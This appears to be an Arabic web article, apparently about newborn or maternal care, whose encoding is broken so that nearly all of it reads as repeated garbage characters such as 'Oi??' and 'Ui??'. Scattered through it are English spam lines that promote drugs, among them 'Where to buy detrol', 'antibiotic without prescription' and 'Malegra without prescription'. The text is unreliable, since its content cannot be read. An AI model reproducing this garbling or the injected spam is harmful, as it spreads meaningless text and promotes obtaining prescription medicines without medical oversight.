Oi??Oi??Ui?? O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? . O?Ui??Oi??Oi??Oi??O? Oi??O?USOi?? U? Oi??Oi??Ui?? Oi??O?USO?USOi?? Ui??O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi??

O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi??

O?U?O?USOi?? Oi??Ui??U?Oi??Ui?? U? Oi??Ui??Oi??O?Ui?? Ui??O? O?Oi??U?Ui?? Oi??Ui??Ui?? Ui??U?Oi??Oi?? O?O?O?Ui?? Oi??Ui??USUi?? Oi??Ui??USO? Oi??Ui??U?O?USOi??O? U?Oi??Ui??U?O?Oi??Oi?? Oi??Oi??O? Oi??Ui??O?O?Oi??Oi?? Oi??Ui??Oi??Ui??Oi??USOi?? O?Oi??USO? Oi??Ui?? O?Oi??O?Oi?? O?O?Oi??O?Ui??Oi?? O?USOi??Oi??O? O?U? U?Oi??O?Oi??Oi?? U? Oi??Ui??U?O?Oi??Oi?? Oi??Oi??O? Oi??Ui??O?O?Oi??Oi?? Oi??Ui??O?USOi??Oi??O? Oi??USOi??Oi?? O?Oi??USO? Oi??Ui?? O?Oi??O?Oi?? Ui??Oi??Oi??O?Oi?? Oi??Ui??O?USOi??Oi?? U? Ui??Ui??Oi??U? Ui??Ui?? O?O?O?Ui?? U?Oi??Oi??O? O?U?O?USOi?? Oi??Ui??Oi??Ui??Oi??U?Ui?? Oi??Ui??O?Oi??Ui??Ui??Oi?? O?Ui?? O?Oi??Ui??Ui?? Oi??Ui??Oi??O?Ui?? . Ui??Oi??Oi?? USOi??O? Oi??Ui?? Ui??U?Oi??Ui?? Oi??U?Ui??Oi?? O?USUi?? O?U?O?USOi?? Oi??Ui??Ui??U?Ui?? U? O?U?Oi??USO? Oi??Ui??Ui??U?Ui?? .

Ui??Ui?? Ui??Ui??Oi??U? Ui??Oi?? USO?Ui??Ui?? O?Oi??Ui??O?O?USOi?? OY O?Ui??O?Ui??Ui?? Oi??Ui?? Ui??Oi??O?Ui?? Oi??Ui??O?O?Oi??Oi?? Oi??Ui??O?Ui??Oi??Oi??O? O?O?Oi??U?Ui?? Oi??Ui??Ui?? O?USOi??Oi??O? OY

Oi??Ui??Oi??Oi??Oi??O?Oi?? : Ui??Oi?? . Ui??Oi?? USU?Oi??O? Oi??Ui?? U?O?USUi??Oi?? Ui??Oi??O?Ui?? Ui??U?Ui?? Oi??Ui??O?O?Oi??Oi?? Ui??Oi??O?Ui??U? O?Ui??Oi??Ui??Oi?? . Ui??Oi??Oi?? USO?Ui??Ui?? O?U?O?USOi?? Oi??Ui??Ui??U?Ui?? U? Ui??USO? O?O?USOi?? Oi??Ui??Oi?? O?U?Oi??USO? Oi??Ui??Ui??U?Ui?? U?Ui??Oi??O?O? U?USUi?? Oi??Oi??Oi?? Ui??Ui??Oi??U? Oi??Ui??Oi??U?Ui?? U?Ui?? Oi??Ui??Oi??O?Ui?? Oi??U?Oi??Oi?? Oi??O?Ui??Oi??Oi??Oi??Oi?? Ui??Ui?? Oi??Ui??Oi??Oi??Oi??Ui?? Oi??Ui??Oi??Ui??Oi??U?Ui?? Oi??Ui??O?Ui?? USOi??O?Oi?? O?Ui??Oi?? Oi??O?Ui??Oi??Oi??Oi??.
1- Ui??Ui??Oi??Ui??Oi?? Oi??Ui??Oi??O?Oi??USUi?? U? Oi??Ui??Ui??Ui??Oi??Ui??Oi?? Oi??Ui??Oi??O?Oi??O?Oi??

Ui??Oi??Ui?? Oi??Ui??Ui??Ui??Oi??Oi??Ui?? O?U?U?Ui?? Oi??U?Oi??Oi?? Oi??O?Ui??Oi??Oi??Oi?? Ui??Ui?? O?Oi??Ui??Ui?? Oi??Ui??Oi??O?Ui??Ui?? Ui??Ui??Oi??O?O?Oi??O? Oi??Ui??O?Oi??Ui??USOi?? :-

 • Ai??Ui??O?USOi??Oi?? Ui??Oi??Oi??O?U?Oi??U? Oi??Ui??Oi??Ui??O?
 • Ai??Ui??O?USOi??Oi?? Ui??Ui??Oi??Ui??O?Ui??Oi??O?Oi??O? Oi??Ui??Ui??Oi??O?Oi??Oi?? O?Ui?? Oi??Ui??O?O?Oi??Ui?? Oi??Ui??O?Oi??Oi??O?
 • Ui??O?USOi??Oi?? Ui??O?O?Oi?? Oi??Ui??O?O?USUSOi??Oi??O? Oi??Ui??Ui??Oi??Ui??U?Ui??USOi?? O?O?O?O? Oi??Ui??Oi??Ui??Ui?? (U?Ui??U? Oi??Ui??Oi??Ui??Ui??)
 • O?O?USUSOi??Oi??O? Ui??Oi??Ui??U?Ui??USOi?? U?Ui?? Oi??Ui??O?O?Oi??
 • Where to buy detrol

 • O?U?O? Oi??O?O?Oi??O?Oi??Ui?? Ui??O?O?Oi?? U?Oi??USUi??Oi??O? Oi??Ui??O?U?O?USOi??
 • Ui??O?USOi??Oi?? Oi??Ui??O?Ui??Oi??O? U?Ui?? Oi??O?U?Oi?? Oi??Ui??O?O?Oi??
 • U?Oi??USUi??Oi??O? Oi??O?Oi??Ui??Oi?? Oi??Ui??O?O?Oi??
 • Ui??O?USOi??Oi?? Ui??U?Oi??U?O? O?O?Oi?? O?Ui??USU? U?Ui?? Ui??Oi??O?USUi?? Oi??Ui??Ui??Ui??Oi??Ui??O?USUi?? Ui??O? Oi??O?Oi??Ui??Oi?? Oi??Ui??O?O?Oi?? O?Oi??Ui??U?Oi??USUi??Oi??O? U? Oi??Ui??O?Ui?? O?Oi??O?U?Ui?? O?Ui??Ui?? Ui??U?Oi??O? U?USUi??USOi??Oi??USOi?? Oi??Oi??Oi??Oi?? O?Ui??Ui?? Oi??Ui??Ui??O?Ui?? Oi??Ui??Ui??Oi??USO? Oi??U? Oi??Ui??O?O?USO? U? Ui??O? O?Oi??O?Oi?? Oi??Ui??O?Ui??Oi??O? U? O?Ui??USUSOi?? U?Ui?? Oi??Ui??Oi??Ui??O? USO?Oi??U?Ui?? O?O?O? Oi??Ui??U? Oi??Ui??Ui?? Ui??U?Ui?? O?Oi??Ui??Ui??
 • antibiotic without prescription

 • Oi??O?Oi??Ui??Oi?? Oi??Ui??O?O?Oi?? O?Oi??Ui??O?Ui??O? Oi??Oi??U?Oi??Oi?? Ui??O? Oi??Oi??Oi??Oi??O? Oi??Ui??O?O?Oi??Oi?? Oi??Ui??Oi??O?Oi??O?Oi?? Oi??USOi?? Oi??Ui??Ui?? Ui??O? USUi??O?Oi?? O?Ui?? O?Ui??Ui??USOi?? Oi??O?Oi??Ui??Oi?? Oi??Ui??O?O?Oi?? O?Ui??Oi??Ui?? Oi??Ui??U?O?USUi??Oi?? Oi??Oi??U?Ui?? O?Oi??Ui??Oi??Ui??O? U? USO?Oi??U? Ui??O?Oi??Oi?? O?Oi??Ui??Ui??Oi?? Oi??Ui??Ui??U?Ui?? U? O?Oi??Ui??O?Oi?? Ui??Oi?? O?O?Oi??U? O?O?O?Ui??Oi?? Ui??U?Ui?? O?Oi??Ui??Ui?? O?Oi??Ui??Oi??Ui??O?
 • Ui??Ui??U? Oi??Ui??O?O?Oi?? Ui??Oi??Oi?? Oi??Oi??Oi??Ui?? O?O?O? Oi??Ui??U?O?Oi??Oi??Ui?? Oi??Ui??O?Oi??O?USOi?? :-Ai?? USOi??O?Oi?? U?Ui?? O?O?Oi?? Oi??Ui??Oi??Oi??USOi??Ui?? Oi??Ui??O?Ui??Oi??O? U?Ui?? O?Oi??USUi??Oi?? Oi??Ui??O?O?Oi??Oi?? U? Ui??O? O?Ui??Ui??U? O?Oi??O? Oi??Ui??Oi??Ui??O? U? O?O?O?O? Oi??O?U?O? U? Oi??Ui??O?Ui??Oi??O?Oi??O? O?O?Oi??U?Ui?? O?O?O? Oi??Ui??U? Oi??Ui??Ui?? O?Ui??O? Oi??O?USOi??Oi?? O?Ui??Oi??Oi??O?
 • U?Oi??Oi??Oi?? Oi??Ui??O?O?Oi??Ui??
 • Oi??Ui??U?U?Oi?? Oi??Ui??Oi??Oi??USOi?? Oi??Ui??USU?Ui??USOi?? Oi??U? Oi??Ui??O?Ui??Oi??USOi?? (pads) U? Oi??Ui??O?Ui?? O?O?O?O?Ui??Ui??Ui??Oi?? Oi??Ui??U?O?USOi??O?

Ai??2- Oi??Ui??Oi??USOi?? Ui??U?Oi??Ui?? Oi??Ui??Oi??Oi??Oi??O?USUi?? Ui??Ui?? Oi??Ui??O?Oi??Oi??Ui??

Ui??Oi??Ui?? Oi??Ui??Ui??Ui??Oi??Ui??Oi?? O?U?U?Ui?? Oi??U?Oi??Oi?? Oi??O?Ui??Oi??Oi??Oi?? Ui??Ui?? O?Oi??Ui??Ui?? Oi??Ui??Oi??O?Ui?? O?O?O?O? U?Oi??Oi??Oi?? Oi??Ui??O?O?Oi??Ui?? U? Oi??Ui??Oi??Oi??O?U?Oi??U? U? Oi??Ui??Oi??Ui?? USOi??O?Oi?? Oi??Ui??O?Ui??Oi??O? USO?Oi??U?Ui?? Oi??Ui??Ui?? Oi??Ui??Ui??U?Ui?? Oi??Ui??O?Oi??Ui??Ui??.
3- O?USUi?? Oi??Ui??U?Oi??O?USUi??
O?O?O?O? Oi??Ui??O?Ui??Ui??Oi?? U? Oi??Ui??O?Ui?? O?Oi??O?Ui?? Oi??Ui??Ui?? Oi??Ui??Oi??Oi??O?U?Oi??U? Oi??Ui??Ui??O?Ui??Ui?? Oi??Ui??Ui??Oi??O?Ui?? Oi??Ui??Ui?? Oi??O?Ui??Oi??Oi??Oi?? Oi??Ui??Oi??Ui??O?

4-Oi??Ui??Oi??U?O? U? Oi??Ui??U?U?O?
Ui??Oi??Oi?? Ui??USO? Oi??O?Ui??Oi??Oi??Oi?? U? Oi??Ui??Ui??Oi?? O?Oi??Oi??U?Ui?? Oi??O?Ui??Oi??O? Ui??Ui?? Oi??Ui??Oi??Ui??O? Oi??Ui??Ui??USO? Ui??O?USOi??Oi?? Oi??Ui??Oi??Oi??O?U?Oi??U? Oi??Ui??Ui??O?O?Ui??Oi?? U? Ui??Ui??Oi?? Oi??Ui??O?Oi??Oi??USO?
5- O?Oi??Ui??Oi?? Oi??Ui??Oi??O?USUi??
– O?O?Oi?? Oi??Ui??O?O?USOi??Oi??O? Oi??Ui??Ui??Oi??Ui??U?Ui??USOi?? U?Ui?? Oi??Ui??O?O?Oi?? Ui??O? O?Oi??O?Ui?? Oi??Ui??Ui?? O?Ui??U?Oi?? O?Ui??O?Oi?? O?Ui??Ui?? Oi??Ui??Oi??O?USUi??
6-U?Ui??U? Oi??Ui??Oi??Ui??Ui??
Oi??Ui??U?Oi??Ui?? U? Oi??Ui??Oi??O?Oi?? U? Oi??Ui??O?Ui??Oi?? U? Oi??Ui??Oi??U?O?Oi??U?
7-Oi??Ui??Ui??Ui??O?
U? Ui??O? USO?Ui??Oi?? U?Ui?? Oi??Ui?? Ui??Ui?? Ui??Oi??Ui?? Oi??Ui??Ui??Ui??Oi??Oi??Ui?? U?Ui??U? O?O?Oi??Oi??Oi?? O?Ui?? Ui??Ui??Oi?? O?Ui??USOi?? Oi??Ui??Ui??U?Ui?? U? USOi??O?Oi?? O?Ui?? Oi??Ui??O?Oi??Ui??O? Ui??O? Oi??Oi??Oi??Oi??O? Oi??Ui??O?O?Oi??Oi?? Oi??Ui??U?Oi??O?Oi??Oi??
8 -Oi??Oi??Oi??Oi?? Oi??O? Oi??Ui??O?O?Oi??O?
U? Ui??O? USO?Oi??U? O?Ui??O? O?Ui??USOi?? U?Ui?? O?Ui??U? Oi??Ui??Oi??Ui??Oi??U?Ui?? Oi??USOi??Oi?? (Oi??Oi??Oi??O? Ui??Ui??Oi??Ui?? U?USU? O?O?Oi??Ui??Oi?? Ui??Ui?? Oi??Oi??Oi??Oi?? Oi??O? Oi??Ui??O?O?Oi??O?)
9- Oi??Ui??Ui??Oi??Ui??Oi??O? Oi??Ui??O?U?O?Oi??O? U? O?Ui??Ui?? O?O?O?Oi??O?Ui??Oi?? :-

 • Oi??Ui??Oi??Ui??USUi??USOi??
 • Oi??Ui??Oi??USU?O? Oi??Ui??Oi??Ui??U?USOi?? U? Oi??O?Oi??O?USOi?? Oi??Ui??Oi??Ui??U?
 • Oi??Ui??Oi??Ui??O?Oi??U? Oi??Ui??Ui??O?Ui??Ui?? U? Oi??Oi??Oi??Oi??Oi??O? Oi??Ui??Ui??Oi??Ui??
 • Oi??Ui??O?Oi??Ui??Ui?? Oi??Ui??U?Oi??Oi??Oi??Ui??
 • O?U?O? Oi??Ui??O?O?Oi??Ui??Ui?? Ui??O? Ui??Ui??Oi??Ui??Oi?? Oi??U?Ui?? Oi??Ui??O?USUi??

Ai??Oi??O?Ui??Oi?? O?O?O? Ui??Oi??O?Ui??Oi??Oi??Oi?? Oi??Ui??Oi??Ui??O? Ui??U? U?Oi??USUi??Oi??O? Oi??Ui??O?U?O?USOi?? Ui??U?O?Ui??Oi??

USOi??O?Ui??O? Oi??Ui??U?Oi??USOi??U?Ui?? U?Ui?? U?Oi??O? U?Oi??USUi??Oi??O? O?U?O?USOi?? O?U?Ui?? Oi??Ui??Oi??Oi??U?O? Ui??Ui??Oi??O?USO? U?Ui??Oi?? Ui??U? U?Oi??Ui?? Oi??Ui??Oi??Ui??Oi?? Ui??Oi?? USOi??O?Oi??Oi?? Oi??Ui??Ui?? O?Ui??Ui?? Oi??U? Oi??O?Oi??Oi?? Oi??Ui??Oi??O?USO? , U?USOi??O?Oi?? Oi??O?O?Oi?? Ui??O?Oi??Oi??Oi?? O?U?O?USOi?? U? Ui??Oi??Oi?? Ui??U? Oi??O?Ui??Oi?? Oi??O?O?Oi??O? Oi??O?Ui??Oi??Oi??Oi?? Oi??Ui??Oi??Ui??O? Oi??Ui??O?Ui?? Ui??Oi??Oi??Ui??Oi?? Ui??O?USUi??Oi?? O?Oi??Ui??O?USOi??O?Oi??O?. U?Ui??Oi??Ui??Oi?? USU?Oi??O? Ui??Oi??O?Oi?? Ui??O?USUi??Oi?? U?Ui?? U?Oi??USUi??Oi??O? Oi??Ui??O?U?O?USOi?? USUi??U?Ui?? Oi??U? O?U?Oi??O? O?Ui??Ui?? Oi??Ui?? Ui??U?Oi??Ui?? O?Oi??Ui??Oi??O?Ui?? O?O?Oi?? Oi??Ui??Oi??Ui??Oi??U?Ui?? Oi??Ui??Oi??O?Oi??O?Oi?? U?O?O?Oi??Ui?? U?Ui?? Oi??Ui??Oi??O?Ui?? Ui??O?Oi??Oi??Oi?? Ui??Ui??O?Oi??O?Oi?? U? Ui??U?Ui?? Oi??Oi??Oi?? O?Ui?? U?Oi??O?Ui??Oi?? O?Ui??Ui?? Oi??Ui??Oi??Ui??Oi??U?Ui?? Oi??Ui??Oi??O?Oi??O?Oi?? O?Oi??O?Ui?? Oi??Ui??Ui?? Ui??U?Ui?? O?Oi??Ui??Ui?? Oi??U?Oi??Oi?? Ui??Ui?? Ui??Oi?? U?Oi??Ui?? O?Ui??USUi??.
U?Oi??Ui??U? Oi??U?Ui?? Oi??Ui??U?Ui?? U?O?Ui?? Ui??U?O?USOi?? U?Oi??USUi??Oi??O? O?U?O?USOi?? Oi??Ui??Ui??Oi??Ui??Oi??O? U?O?Oi??O?Ui??U? U?Ui?? O?Oi??U?USO?Ui??Oi?? O?Ui??Oi??Ui??Oi?? O?Ui?? Oi??Ui?? U?Oi??USUi??Oi??O? O?U?O?USOi??. O?USOi??Oi?? Ui??Ui??Oi??Ui??Oi?? Oi??U?Ui?? Oi??Ui??U?Ui?? Ui??Ui??Oi?? Ui??U?O? Oi??Oi??Oi?? Oi??O?Oi?? Ui??Ui?? U?Oi??USUi??Oi??O? Oi??Ui??O?U?O?USOi?? . Ui??Oi??Oi?? USOi??O? Oi??Ui??Oi??Oi??U?O? Ui??Oi??O?USO? Oi??Ui??Oi??Ui??O?USOi?? U? O?O?Ui?? Oi??Ui??Oi??O?O?Ui??Oi??O? O?Ui??Ui?? Ui??Oi??Oi??Oi??Oi?? Oi??Ui??Oi??Oi??O?Ui??Oi??O? Oi??Ui??Ui??Ui??O?O?Oi??Oi??.

Oi??Ui??U?Ui??Oi??USOi?? Ui??Ui?? Oi??O?Ui??Oi??Oi??Oi?? Oi??Ui??O?O?Oi??Oi??

O?Oi??Ui??O? Oi??Ui??O?O?Oi??Oi?? Ui??Ui??O?Ui??O? U?Ui?? Oi??U?Ui??Oi??O? Oi??Ui??Oi??Oi??U?Oi??Ai?? :U? Ui??Ui?? Ui??Oi?? O?USUi?? 10 Oi??O?Oi??Oi??Oi?? Oi??O?Ui?? 4 O?Oi??Oi??Oi?? Ui??O?Ui??Ui??USUi?? Oi??U?Oi??Oi??O? Oi??Ui??Ui??USUi??Oi??Ui??USUi?? (Oi??O?O?Oi?? Oi??Ui??Oi??Ui??O? Oi??Ui??O?Ui?? O?O?Oi??USUi?? Oi??Ui??Ui??U?Ui?? Oi??Ui??O?Oi??U?Ui??) Oi??USOi?? Oi??Ui??Ui?? USU?Oi??O? O?Ui??O? Oi??Ui??O?O?Oi??Oi?? Ui??Ui??O?Ui??O? Ui??USOi??Ui??Ui?? Oi??Ui??Oi??Ui??O? Ui??Ui?? Oi??O?O?Oi?? Oi??Ui??O?Ui??O? U? Oi??Oi??U?Ui??Ui??Oi??, Ui??Oi??Oi?? USOi??O? U?Oi??O? U?Oi??Ui??Ui?? Oi??Ui??O?Ui??O? U?Ui??U? Oi??Oi??Ui??Ui?? Oi??Oi??U?Oi??O? Oi??Ui??U?Ui??Oi??USOi??
U?Oi??USUi?? Oi??Ui??Oi??Ui??Oi??USOi?? Ui??Ui?? Oi??Ui??O?Ui??O? Malegra without prescription, dopoxetine without prescription :Ui??O?O?Ui?? Oi??Ui??Ui??Oi??O? Ui??Oi?? O?Oi??Ui??U?Oi?? USO?O?Ui??O?U?Ui?? Oi??Ui?? U?Oi??Ui??Ui?? Oi??Ui??O?Ui??O? USU?Oi??O? U?Ui??Oi?? U?Ui?? Oi??Ui??Ui??Oi??Oi??USU? U? O?Ui??O? Ui??O?U?Ui?? Oi??Ui??O?Oi??Oi??, U?Oi??Ui??Ui?? Oi??Ui??O?Ui??O? USOi??O? Oi??Ui?? USU?Oi??O? O?Ui??Ui?? Oi??Ui??O?O?Oi??Oi?? Oi??U?Oi??Ui?? Oi??Ui??Ui??Ui??Oi??Oi?? Oi??O?O?O?Oi??O?Oi?? Ui??Ui?? Oi??Ui??O?Oi??U?Ui?? U? Oi??O?Ui?? Oi??Ui??O?Oi??U?O? , Oi??USU?Oi?? U? O?O?Oi??O?Oi?? Oi??O?Ui?? U? Oi??Ui?? U?Oi??Ui?? Oi??Ui??O?O?Oi??Oi?? Ui??Ui??O?Ui??O? O?USOi?? Ui??O?Oi??O?Oi?? .Ui??Oi??Ui??Oi?? Oi??Oi??Oi?? U?Ui??O? U?Ui?? O?USOi??Oi??Oi?? Ui??U?USU?Oi?? Oi??U? O?O?Oi??U?Ui??USUi?? O?USUi?? Oi??Oi??Ui??Oi??O? Oi??Ui??Ui??Oi??Ui??Oi??O? U?Ui?? U?O?Oi?? Oi??Ui??Ui??Ui??Oi??Oi?? U?Ui?? Oi??Ui??O?Oi??Oi??O? Ui??U?Ui?? U?Ui?? Oi??Ui??O?Ui?? , USOi??O? U?Oi??O? U?Oi??Ui??Ui?? Oi??Ui??O?Ui??O? Oi??USOi??Oi??.

[box type=”note” ]O?Ui??Ui?? U?Ui?? U?Oi??O? Oi??Ui?? USOi??O?Oi??Oi?? U?Oi??Ui??Ui?? Oi??Ui??O?Ui??O? Oi??Ui??Oi??Ui?? USUi??Oi??O?O?Ui?? U? USO?Ui?? Oi??Ui??U? O?Ui??O?Oi??O?O?Oi?? Oi??O?USO? Oi??Ui??Oi??Ui??O?USOi?? Oi??USOi?? O?O?Ui??U?O? Oi??Ui??U?Oi??O? U?Oi??USUi??Oi??O? Oi??Ui??Oi??Ui??Oi??USOi??.

USU?Oi??O? U?Oi??USUi??Oi??O? O?Oi??O?U?Ui?? O?Ui??Ui?? O?Oi??Ui??Ui?? Oi??Ui??Oi??USOi?? U?USUi??USOi??Oi??Ui?? U?Ui??Oi?? Oi??U? U?USO?USOi??Oi??Ui?? U?Ui??Oi?? Oi??U? U?USUi??USOi??Oi??Ui?? U? U?USO?USOi??Oi??Ui?? Ui??O?Oi??.

USU?Oi??O? U?Oi??USUi??Oi??O? Ui??Oi??Oi??U?Oi??Oi?? Ui??Ui??O?O?Oi??Oi?? Oi??Ui??Oi??O?Oi??O?Oi?? U? U?Oi??USUi??Oi??O? O?Oi??O?U?Ui?? O?Ui??Ui?? Ui??U?Oi??O? O?U?O?USOi?? U? Oi??Ui??Oi??USOi?? U?Ui?? Ui??U?O? Oi??Ui??U?Ui??O? Ui??Oi??U?Ui?? Oi??Ui??O?O?Oi??Oi?? O?O?USO?Oi?? Oi??Ui??Oi??O?Oi??O?USOi?? U? Oi??Ui??O?Ui?? O?O?Oi??U?Ui?? Oi??Ui??Ui?? Oi??Ui??Ui??U?Ui?? Oi??Ui??O?Oi??U?Ui?? U?Ui?? U?Ui??O? Ui??Oi??USOi?? Oi??O?Oi??.[/box]

Ai??U?USU?USOi?? O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? U? O?Ui??Oi??Oi?? Oi??O?Ui??Oi??Oi??Oi?? Oi??Ui??Oi??Ui??O?

O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? O?Oi??O?O?Oi??O?Oi??Ui?? Ui??USO?Oi?? Oi??O?Oi??Ui??Oi?? Oi??Ui??O?O?Oi??
USO?Oi??Ui?? Ui??O?Oi??Oi??Oi?? Ui??Oi??Oi??Ui??Oi?? U?Ui?? O?U?O?USOi?? Oi??Ui??Oi??Ui??Oi??U?Ui?? Oi??Ui??O?Oi??Ui??Ui??Oi?? Oi??Ui??Ui??O?O?Oi??Oi??, Ui??Oi??Ui?? Oi??Ui??Oi??O?Oi??USUi?? U? Oi??Ui??Ui??Ui??Oi??Ui??Oi?? Oi??Ui??Oi??O?Oi??O?Oi?? U? Oi??Ui??U?Oi??Ui?? U? Oi??Ui??Oi??O?Ui?? U?Ui??Ui?? O?Oi??U?Oi?? O?Oi??Ui??Oi?? U?O?Ui??Oi??Oi??O? Oi??Ui??O?Ui??Oi??O? Oi??Ui??Oi??Ui??O?Oi?? O?O?O?Oi?? Oi??Ui??Ui??Oi??USOi??Oi?? O?Oi??Ui??U?Oi??Ui??. U?Ui??Oi?? Oi??Ui??Ui?? USO?Oi??Ui??Oi?? Oi??USOi??Oi?? Oi??Ui??Oi??O?U?O? Oi??Ui??Oi??Ui??Oi??Oi??O? U? Oi??Ui??Oi??Oi??U?O? Oi??Ui??O?U?O?Oi??O? U? USUi??Ui??O? O?Ui??U?Oi?? O?Ui??O? O?Ui??USOi?? U? Oi??Ui??O?Ui?? O?O?O?O?Ui??Oi?? Oi??O?U?Oi?? Oi??Ui??O?O?Oi??Oi?? Oi??Ui??Oi??O?USO?Oi?? Oi??USUi?? O?Ui??O?O? O?Oi??O? Oi??Ui??Oi??Ui??O? U? USO?Oi??Ui??Oi?? Oi??USOi??Oi?? Oi??Ui??Ui??O?Oi??Ui?? Oi??Ui??U?Oi??O?O?Oi??.
O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? O?Oi??O?O?Oi??O?Oi??Ui?? Ui??USO?Oi?? Oi??Ui??Ui??Ui??O?
U? USUi??U?Ui?? O?Oi??O?O?Ui??O?Oi??U? Oi??O?O?Oi?? Oi??Ui??Ui??USUi??Oi??Ui??USUi?? Oi??Ui??Ui??U?Oi??U?O?Oi?? O?O?Ui??O? Oi??Ui??Ui??Ui??O?.
O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? O?Oi??O?O?Oi??O?Oi??Ui?? Ui??USO?Oi?? Oi??Ui??U?Ui??U?
U? USO?Ui??Ui?? O?Ui??Ui?? Oi??O?Ui??Oi?? Oi??O?Ui??Ui?? Ui??Ui??USUi??Oi?? Ui??Ui?? Ui??USO?Oi?? O?Ui??Oi??Oi?? Oi??Ui??Ui??Ui??O? Ui??Oi??Ui?? O?Oi??O?O?Oi??O? Oi??Ui??U?Ui??U? Oi??U?Oi??Oi?? O?Ui??Ui??Oi??.
O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? O?Oi??O?O?Oi??O?Oi??Ui??Ai??Oi??Ui??U?Oi??Oi??U?O?USUi??Oi??Ui?? Ui??USO?Oi??
U? Oi??Ui??Oi??Ui?? USUi??U?Ui?? O?O?Ui??O?USOi?? Oi??O?Ui??Oi?? O?Ui??USUi??Oi?? Ui??Ui?? Oi??Ui??Oi??Ui??O? U?USO?Oi??Ui??Oi?? U?Oi??USOi?? Ui??Ui?? Oi??Ui??O?Oi??O?O?Oi??O? O?Oi??Ui??U?O?Ui??Oi?? U? USU?O?Oi?? Oi??USOi??Oi?? Ui??U?Ui?? Oi??Ui??Oi??Ui??O? Oi??Ui??Ui??O?Oi??Ui??Oi?? Oi??O?Ui?? Oi??Ui?? Ui??Ui?? USU?Ui?? Ui??Oi??Oi??O? O?O?Ui?? O?Ui??O? U? Ui??U?Ui?? Oi??Ui??Ui??O?U? Ui??Ui?? O?Ui??Ui?? Oi??Ui??U?Oi??Oi??U?O?USUi??Oi??Ui?? Ui??USO?Oi?? Ui??Ui??Oi?? Ui??U? O?U?O?USOi?? U? O?U?Oi??USO? Oi??Ui??Ui??U?Ui??, Oi??USOi?? USO?O?Ui??O?U? Oi??O?Ui??Oi?? O?Oi??Oi??USOi?? Oi??U? O?Ui??USUi??Oi?? Ui??Ui?? Oi??O?Ui??Oi??O? Oi??Ui??Oi??Ui??O? U? USUi??U?Ui?? O?Oi??O?Oi??Ui??O?Ui??Oi?? Ui??O?Oi??Ui?? Ui??Oi??Ui??Ui??Oi?? Oi??O?Ui??Oi?? Oi??O?USO?Oi?? Ui??Ui?? Oi??Ui??Oi??Ui??O? Oi??Oi??O? Ui??U?Ui?? Oi??U?O?Oi?? U? Ui??Ui??Ui??O? Oi??Ui??O?Ui??. U?Ui??Oi?? USO?Ui??Ui?? Oi??USOi??Oi?? O?Ui??Ui?? O?Oi??U?USO? Oi??Ui??U?U?Ui??Oi??Oi??USUi?? U?USO?Oi??Ui?? Oi??Ui??O?O?Oi??Oi?? Oi??Ui??O? Ui??O?O?U?O? U? Ui??O?Oi??Ui?? U? Oi??U?Oi??Oi?? O?O?Oi??O? O?Oi??Ui??Oi??Oi??Oi??U?Oi?? Oi??Ui??Ui?? Oi??Ui??Ui??
USO?Oi??Ui??Oi?? Oi??Ui??O?Oi??Oi??O?USO? Oi??Ui??Oi??U?USO?Oi??.

O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? O?Oi??O?O?Oi??O?Oi??Ui?? Oi??Ui??O?U?O?USOi?? Oi??Ui??U?USUi??USOi??Oi??Ui??
USO?Oi??Ui??Oi?? O?Ui??O? Oi??O? Oi??Ui??O?O?Oi??O? U? USU?O?Oi?? Ui??Ui?? Ui??U?Ui?? Oi??Ui??O?O?Oi??Oi?? Oi??Ui??Oi??Oi??Ui??Ui?? U? USUi??O?Ui?? Oi??Ui??Oi??Ui??O? Oi??USOi??Oi?? Oi??USOi?? USUi??U?Ui?? O?Oi??O?Oi??Ui??Oi?? Oi??O?Ui??Oi?? Oi??Ui??Oi??Ui??O? Oi??Ui??Ui??O?USUi??Oi??.
O?Oi??O?Ui??U? Oi??Ui??U?Oi??O? U? O?Oi??U?USO?Oi??O? Oi??Ui??O?Ui??O?USOi?? O?Oi??Oi??Ui??Oi??Oi?? Oi??Ui??U?U?Oi??U?Ui?? Oi??O?O? Oi??Ui??Oi??Oi??Ui??Oi?? U? Oi??O?O? O?U?U?Ui?? Oi??Ui??Ui??Oi??USOi?? U? Oi??Oi??USOi?? Oi??Ui??Oi??O?USO?.
O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? O?Oi??O?O?Oi??O?Oi??Ui?? Oi??Ui??O?Ui??O?USOi?? Oi??Ui??Ui??O?USOi??
USO?O?O?Oi?? Oi??Ui??O?Ui??O?USOi?? Oi??Ui??Ui??O?USOi?? Ui??U? Oi??Ui??Oi??Ui?? Oi??Ui??Oi??Ui??Oi??Ui?? Ui??O?U?O?USOi?? Oi??Ui??Oi??Ui??Oi??U?Ui?? Oi??Ui??Oi??O?Oi??O?Oi?? O?Oi??Ui??O?O?Oi??O?Ui?? Ui??O? Oi??Ui??Ui??USO?U?Oi??USOi??Oi??O?Ui?? U? Oi??Ui??Ui??USO?Oi?? .Ai?? U? USOi??O?Ui??U? O?Ui?? Oi??Ui??O?Ui??O?USOi?? Oi??Ui??U?USUi??USOi??Oi??Ui?? (Oi??Oi??Ui??Oi??Oi?? Oi??Ui??U?U?Oi??U?Ui??) Oi??USOi?? Oi??Ui??Ui?? Ui??Oi?? USU?Oi??Ui?? O?Ui??Oi??Ui??Oi?? Oi??O?O?Oi??O?Oi??Ui?? Oi??Ui??O?Ui??O?USOi?? Oi??Ui??U?USUi??USOi??Oi??Ui?? Ui??Ui??Oi??Ui??Oi??U?Ui?? Oi??Ui??Oi??O?Oi??O?Oi?? U? Oi??Ui??Oi??Ui?? Ui??O? USOi??O?Ui?? Oi??Ui??Ui?? Ui??O?USOi??Oi?? O?U?O?USOi?? O?USUi??Ui??Oi?? Oi??Ui??O?Ui??O?USOi?? Oi??Ui??Ui??O?USOi?? O?Ui??Ui?? Oi??O?Oi?? U? Ui??Ui??Oi??O?O? Ui??Ui??Oi??Ui?? Oi??Ui??Oi??Ui??Oi??U?Ui??.
O?U?O?USOi?? Oi??Ui??O?O?Oi??Oi?? O?Oi??O?O?Oi??O?Oi??Ui?? Oi??Ui??Ui??USO?U?Oi??USOi??Oi??O?Ui??
